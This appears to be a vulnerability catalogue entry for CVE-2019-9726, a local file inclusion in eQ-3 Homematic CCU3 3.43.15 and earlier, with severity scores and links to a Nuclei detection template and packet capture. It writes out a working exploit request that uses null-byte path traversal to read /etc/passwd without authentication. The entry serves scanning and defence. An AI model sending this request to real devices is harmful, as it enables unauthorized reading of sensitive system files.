| Title | Homematic CCU3 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the system. |
| Remediation | Apply the latest security patches or updates provided by the vendor. |
| CVSS Score | 7.5 |
| EPSS Score | 0.58772 |
| CVE ID | CVE-2019-9726 |
| CWE ID | CWE-22 |
| Tags | cve2019 cve homematic lfi eq-3 vuln |
eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device’s filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
GET /.%00./.%00./etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9726.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-9726.pcap
N/AN/A